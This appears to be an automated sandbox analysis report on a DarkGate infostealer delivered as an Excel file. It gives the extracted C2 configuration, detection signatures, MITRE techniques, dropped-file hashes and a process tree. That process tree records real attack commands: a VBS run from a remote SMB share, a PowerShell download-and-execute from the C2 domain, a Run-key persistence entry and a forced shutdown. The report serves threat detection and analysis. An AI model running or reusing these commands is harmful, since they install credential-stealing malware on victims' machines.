darkgate | 0a0fb9fe1cf34cd8fc6caa01d70849dee3d38f106cd1dfd69657051cf74c320e

Analysis

max time kernel
111s
max time network
122s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
27-02-2024 14:57

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

scanned_doc#2024-27-2_5747.xlsx
Size

55KB
MD5

66658e42a106a416a36399aa525f1977
SHA1

9229786a060fc867777e16ff20ebd3afe7b6867a
SHA256

aa03bd94063f4e5e1275b28193cccc6302117c4801d278d9131394acb62fe09d
SHA512

8d2a18eb3d5133fd43f50e80f1fe7a31da7b41fc38b2375879efb0c7f335534ab4952562f0bb923a59239fc35c17cea0be6461e1f83deeafb46371793b205197
SSDEEP

1536:p/ToOEjzAw7Y2r7DUsV4XzY9t3jSagJYwehu:BoOAcw7nXDUsOjm3jTxhu

Score

10^/10

darkgate admin888 persistence spyware stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

remasterprodelherskjs.com

Attributes

anti_analysis
false
anti_debug
false
anti_vm
false
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
PAuTCBnH
minimum_disk
50
minimum_ram
7000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 23 IoCs

resource	yara_rule
behavioral1/memory/3712-272-0x0000000005720000-0x0000000005A6F000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-273-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-278-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/3712-276-0x0000000005720000-0x0000000005A6F000-memory.dmp	family_darkgate_v6
behavioral1/memory/1080-283-0x0000000002D60000-0x0000000003502000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-284-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-285-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-286-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-287-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1080-289-0x0000000002D60000-0x0000000003502000-memory.dmp	family_darkgate_v6
behavioral1/memory/2736-359-0x0000000005460000-0x00000000057AF000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-360-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1080-361-0x0000000002D60000-0x0000000003502000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-364-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-365-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-366-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-369-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-371-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-387-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/2392-451-0x0000000005880000-0x0000000005BCF000-memory.dmp	family_darkgate_v6
behavioral1/memory/2392-452-0x0000000005880000-0x0000000005BCF000-memory.dmp	family_darkgate_v6
behavioral1/memory/2612-453-0x0000000003210000-0x00000000039B2000-memory.dmp	family_darkgate_v6
behavioral1/memory/1080-457-0x0000000002D60000-0x0000000003502000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2740	3172	WScript.exe	72
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4216	3172	WScript.exe	72
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2800	3172	WScript.exe	72

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 3712 created 2656	3712	AutoIt3.exe	66
PID 2612 created 3632	2612	GoogleUpdateCore.exe	56
PID 2612 created 3624	2612	GoogleUpdateCore.exe	55
PID 2612 created 3888	2612	GoogleUpdateCore.exe	57

Blocklisted process makes network request 12 IoCs

flow	pid	Process
23	4144	powershell.exe
24	4144	powershell.exe
26	4144	powershell.exe
27	4144	powershell.exe
65	4560	powershell.exe
68	4560	powershell.exe
74	4560	powershell.exe
78	4560	powershell.exe
312	2408	powershell.exe
316	2408	powershell.exe
323	2408	powershell.exe
325	2408	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
3712	AutoIt3.exe
2736	AutoIt3.exe
2392	AutoIt3.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1903027113-674645041-2759338396-1000\Software\Microsoft\Windows\CurrentVersion\Run\HeedCHF = "C:\\ProgramData\\dadadee\\Autoit3.exe C:\\ProgramData\\dadadee\\hehbhgb.a3x"	GoogleUpdateCore.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GoogleUpdateCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GoogleUpdateCore.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GoogleUpdateCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GoogleUpdateCore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3172	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
3712	AutoIt3.exe
3712	AutoIt3.exe
3712	AutoIt3.exe
3712	AutoIt3.exe
2612	GoogleUpdateCore.exe
2612	GoogleUpdateCore.exe
2612	GoogleUpdateCore.exe
2612	GoogleUpdateCore.exe
2612	GoogleUpdateCore.exe
2612	GoogleUpdateCore.exe
2612	GoogleUpdateCore.exe
2612	GoogleUpdateCore.exe
1080	GoogleUpdateCore.exe
1080	GoogleUpdateCore.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
2736	AutoIt3.exe
2736	AutoIt3.exe
2408	powershell.exe
2408	powershell.exe
2408	powershell.exe
2408	powershell.exe
2392	AutoIt3.exe
2392	AutoIt3.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2612	GoogleUpdateCore.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeIncreaseQuotaPrivilege	4276	WMIC.exe
Token: SeSecurityPrivilege	4276	WMIC.exe
Token: SeTakeOwnershipPrivilege	4276	WMIC.exe
Token: SeLoadDriverPrivilege	4276	WMIC.exe
Token: SeSystemProfilePrivilege	4276	WMIC.exe
Token: SeSystemtimePrivilege	4276	WMIC.exe
Token: SeProfSingleProcessPrivilege	4276	WMIC.exe
Token: SeIncBasePriorityPrivilege	4276	WMIC.exe
Token: SeCreatePagefilePrivilege	4276	WMIC.exe
Token: SeBackupPrivilege	4276	WMIC.exe
Token: SeRestorePrivilege	4276	WMIC.exe
Token: SeShutdownPrivilege	4276	WMIC.exe
Token: SeDebugPrivilege	4276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4276	WMIC.exe
Token: SeRemoteShutdownPrivilege	4276	WMIC.exe
Token: SeUndockPrivilege	4276	WMIC.exe
Token: SeManageVolumePrivilege	4276	WMIC.exe
Token: 33	4276	WMIC.exe
Token: 34	4276	WMIC.exe
Token: 35	4276	WMIC.exe
Token: 36	4276	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4276	WMIC.exe
Token: SeSecurityPrivilege	4276	WMIC.exe
Token: SeTakeOwnershipPrivilege	4276	WMIC.exe
Token: SeLoadDriverPrivilege	4276	WMIC.exe
Token: SeSystemProfilePrivilege	4276	WMIC.exe
Token: SeSystemtimePrivilege	4276	WMIC.exe
Token: SeProfSingleProcessPrivilege	4276	WMIC.exe
Token: SeIncBasePriorityPrivilege	4276	WMIC.exe
Token: SeCreatePagefilePrivilege	4276	WMIC.exe
Token: SeBackupPrivilege	4276	WMIC.exe
Token: SeRestorePrivilege	4276	WMIC.exe
Token: SeShutdownPrivilege	4276	WMIC.exe
Token: SeDebugPrivilege	4276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4276	WMIC.exe
Token: SeRemoteShutdownPrivilege	4276	WMIC.exe
Token: SeUndockPrivilege	4276	WMIC.exe
Token: SeManageVolumePrivilege	4276	WMIC.exe
Token: 33	4276	WMIC.exe
Token: 34	4276	WMIC.exe
Token: 35	4276	WMIC.exe
Token: 36	4276	WMIC.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeShutdownPrivilege	4672	shutdown.exe
Token: SeRemoteShutdownPrivilege	4672	shutdown.exe

Suspicious use of SetWindowsHookEx 21 IoCs

pid	Process
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
3172	EXCEL.EXE
1584	LogonUI.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 3172 wrote to memory of 2740	3172	EXCEL.EXE	74
PID 3172 wrote to memory of 2740	3172	EXCEL.EXE	74
PID 2740 wrote to memory of 4144	2740	WScript.exe	75
PID 2740 wrote to memory of 4144	2740	WScript.exe	75
PID 4144 wrote to memory of 3712	4144	powershell.exe	77
PID 4144 wrote to memory of 3712	4144	powershell.exe	77
PID 4144 wrote to memory of 3712	4144	powershell.exe	77
PID 3712 wrote to memory of 2612	3712	AutoIt3.exe	78
PID 3712 wrote to memory of 2612	3712	AutoIt3.exe	78
PID 3712 wrote to memory of 2612	3712	AutoIt3.exe	78
PID 3712 wrote to memory of 2612	3712	AutoIt3.exe	78
PID 2612 wrote to memory of 1080	2612	GoogleUpdateCore.exe	79
PID 2612 wrote to memory of 1080	2612	GoogleUpdateCore.exe	79
PID 2612 wrote to memory of 1080	2612	GoogleUpdateCore.exe	79
PID 2612 wrote to memory of 1080	2612	GoogleUpdateCore.exe	79
PID 3172 wrote to memory of 4216	3172	EXCEL.EXE	80
PID 3172 wrote to memory of 4216	3172	EXCEL.EXE	80
PID 4216 wrote to memory of 4560	4216	WScript.exe	81
PID 4216 wrote to memory of 4560	4216	WScript.exe	81
PID 4560 wrote to memory of 2736	4560	powershell.exe	83
PID 4560 wrote to memory of 2736	4560	powershell.exe	83
PID 4560 wrote to memory of 2736	4560	powershell.exe	83
PID 2612 wrote to memory of 2552	2612	GoogleUpdateCore.exe	85
PID 2612 wrote to memory of 2552	2612	GoogleUpdateCore.exe	85
PID 2612 wrote to memory of 2552	2612	GoogleUpdateCore.exe	85
PID 2552 wrote to memory of 4276	2552	cmd.exe	87
PID 2552 wrote to memory of 4276	2552	cmd.exe	87
PID 2552 wrote to memory of 4276	2552	cmd.exe	87
PID 3172 wrote to memory of 2800	3172	EXCEL.EXE	90
PID 3172 wrote to memory of 2800	3172	EXCEL.EXE	90
PID 2800 wrote to memory of 2408	2800	WScript.exe	91
PID 2800 wrote to memory of 2408	2800	WScript.exe	91
PID 2408 wrote to memory of 2392	2408	powershell.exe	93
PID 2408 wrote to memory of 2392	2408	powershell.exe	93
PID 2408 wrote to memory of 2392	2408	powershell.exe	93
PID 2612 wrote to memory of 1400	2612	GoogleUpdateCore.exe	94
PID 2612 wrote to memory of 1400	2612	GoogleUpdateCore.exe	94
PID 2612 wrote to memory of 1400	2612	GoogleUpdateCore.exe	94
PID 1400 wrote to memory of 4672	1400	cmd.exe	96
PID 1400 wrote to memory of 4672	1400	cmd.exe	96
PID 1400 wrote to memory of 4672	1400	cmd.exe	96

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3624

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3632

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888
- C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
  "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:1080

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:2656
- C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe
  "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4276
- - \??\c:\windows\SysWOW64\cmd.exe
    "c:\windows\system32\cmd.exe" /c shutdown -f -s -t 0
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1400
  - - \??\c:\windows\SysWOW64\shutdown.exe
      shutdown -f -s -t 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4672

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scanned_doc#2024-27-2_5747.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3172
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\yellow.vbs"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'remasterprodelherskjs.com/wzglcrnu')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4144
  - - C:\temp\AutoIt3.exe
      "C:\temp\AutoIt3.exe" script.a3x
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3712
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\yellow.vbs"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'remasterprodelherskjs.com/wzglcrnu')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4560
  - - C:\temp\AutoIt3.exe
      "C:\temp\AutoIt3.exe" script.a3x
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2736
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\yellow.vbs"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'remasterprodelherskjs.com/wzglcrnu')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2408
  - - C:\temp\AutoIt3.exe
      "C:\temp\AutoIt3.exe" script.a3x
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2392

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:2900

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3aee855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\dadadee\bfhgbhb

Filesize
1KB

MD5
ab757efbb042d1267727499789ee917c

SHA1
2de053974ec4eceda00b3ae91c25cb394767ced8

SHA256
dcc1e92fa2c9edc338b331494e62efb12aa5ddf829b97bdc2190f1badf8c3eca

SHA512
90a08e0a811c9b499502b5493713e3441349d690170bae344e1d38f71e1f133a1f5b020bdc71fe6b15921d9e0fe2a66b27406d7df469b63fdd04142eff1b9092

Download Submit
C:\ProgramData\dadadee\hehbhgb.a3x

Filesize
475KB

MD5
502247358db34601df615d9ce29fa0a4

SHA1
7045fc944765c6e2ae504e485d2c4ff3877123a1

SHA256
c6719852f2e0598d635235de84a25af4fa16b6f1cdbafbe2009c7be192f9062b

SHA512
6f31b65dd2f1b8b20ed33024d02dec809560ebad26e637676b0f43b1eaaa8f0e4a95ef6272f3f57411696bacf635fb89e47f37582a3cfc01ccac3064a22c4b7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f249246e14b54dbdabfe884e240147f1

SHA1
67ab751f7f9c2be51b55d61cd2f70cdff1c4a1fa

SHA256
eedb16dc0348b1b341fbf579d25594a1b3ab7d7d20763af44441720690842555

SHA512
a4a20ac7b3653f99c65b23949b14454eaf6c5b34037973b1fb989242842b6183c191ebb52311a4cf7699874e55b913bb96d30db8c4263b8a484c2c1d29832a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
531b508dbe02bee6b3fdfc99013a548a

SHA1
734967e9e66852dd35df5c57001294b1acb16319

SHA256
11d2a81d880f73ecf4a0b4c80585ecf7973dd9027c9a03ee54fd99fd8669d820

SHA512
a9d7e8a5571cd47d23cc9767d99e2bc2c0debe406f4ca89fb3ef9d8b0fef192eb4f983a8f57b397d428a1db32beb468366e9e27e022ea5e1bbac21ae9e521ce9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
002c23668b05ccfc0972413a35523239

SHA1
440a6d31595fb7a75f755d95ea1a012cdc55f836

SHA256
d6151ed3c9d9a85ad77ab6462844b478d9ca17dd94c9fb1f98c419d3418157dd

SHA512
19050cab65767d90b1a2ffd11e70a418c22082247c1a15134d0f145b42e48425bea0e1a596f71dfba78f4e3240855f7e668bf893b0d9f32ecd850f606bf53c81

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hzlhntdf.d0l.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\HeedCHF

Filesize
32B

MD5
b1d274e67ee42ffe576ef352728e4e69

SHA1
57f699560846fb33bbaf4c73c9447419f75a7178

SHA256
99bf42aef8ce68fc16a77cce6663b29ba2aabed29ba5dafa16c8cdb956381dd0

SHA512
1e382d0698b01e6074550e6d5d6bc085131258201b6d04f4ed6cba6b74fccc0261fa10210eb3f9ca7054e55610fba1e08dd61cd27995cb8728eabf292e27eb1d

Download Submit
C:\temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\temp\bkfaafd

Filesize
4B

MD5
24ab66f8253459cfef71101df18c89d4

SHA1
607dccff3355851e77a4e8570f8635c9dda37ca6

SHA256
3f31f7c0a8a085a93c70dae7fd1f34a4b6cadaebc680d4cad750c385216e7dee

SHA512
f14f2a0dab86d8d27d1731c871dfbf06951c459f0c5d39ebfd25198c5b62c90e32cf9ba0b188ebe5e404a494d7370127906623c488e709dfa1a5a4ceea9311f5

Download Submit
C:\temp\kbcbhah

Filesize
4B

MD5
6c19bba3ae1b814b0d9b252040752dfa

SHA1
b2c12a8e219bb372956c5d7dc1bb41b9ede6072f

SHA256
8307d3115203e58dcdaf956e2c6ca319db4c09e9db00e10a7a816f34ad9e94f4

SHA512
2c6ff5e0e523a546956772b3f63cd593c344ec6feb77fd6e8ea5cb2881a4cf78e3821db742fca653e9ae7d1f7cb04fe59c5fe585dc76608465e1930a23b09ccc

Download Submit
C:\temp\kbcbhah

Filesize
4B

MD5
788ce978cd1efbe6dac398aac6594fc6

SHA1
25bfd645390275295dfebaf48a3d62368214d1e3

SHA256
6d3a7fb713b5428b41623b4555de7c17d6bd8f9fa3418fa216f5027a3847802c

SHA512
97d42e7a7920eb2997a9d1c1a24d2d8cd00a0383b15059eca8585a3d6ebcae0348ac327720d79b59b4d0f361dfa269b2d8dc000dc93e8de1dfaa3f7f473f4e3c

Download Submit
C:\temp\script.a3x

Filesize
469KB

MD5
fed1cada5e6082bc1393036555d061b9

SHA1
37b1a821af0e64104c9ffcb8fa39ab4d78c7374d

SHA256
2c8ddb6ee845e48c776da5e06cbaf4529b5909384e4786f533d6dd3b679d295c

SHA512
6d0fa057c3a1a9aaf39a6fe596d5a12a5f5689dc48811c2e09c001e63f9712e9103d2d21c6afb1d4321823bf6c78263818695e3c8f821f39ad2f4d89404bf630

Download Submit
C:\temp\test.txt

Filesize
76B

MD5
84daf31ae22d4a6a40b0fffda6ea2995

SHA1
7912e09030e200187682f5253068b27fd824faf2

SHA256
c490210dba7ecd1a4987d4dab36d3f6d5a0a1a7eaf47f1e3cf0f93dd4244e65d

SHA512
69210ed3bb6ee8aa0e7a8a5d148774aaae4e58390736354f5ac1ed5919714778234a3d79358dc6299bdcd12a754adbdadee17b4349061107981d865b84245f46

Download Submit
memory/1080-361-0x0000000002D60000-0x0000000003502000-memory.dmp

Filesize
7.6MB

Download
memory/1080-457-0x0000000002D60000-0x0000000003502000-memory.dmp

Filesize
7.6MB

Download
memory/1080-283-0x0000000002D60000-0x0000000003502000-memory.dmp

Filesize
7.6MB

Download
memory/1080-289-0x0000000002D60000-0x0000000003502000-memory.dmp

Filesize
7.6MB

Download
memory/2392-452-0x0000000005880000-0x0000000005BCF000-memory.dmp

Filesize
3.3MB

Download
memory/2392-451-0x0000000005880000-0x0000000005BCF000-memory.dmp

Filesize
3.3MB

Download
memory/2392-450-0x0000000004390000-0x0000000005360000-memory.dmp

Filesize
15.8MB

Download
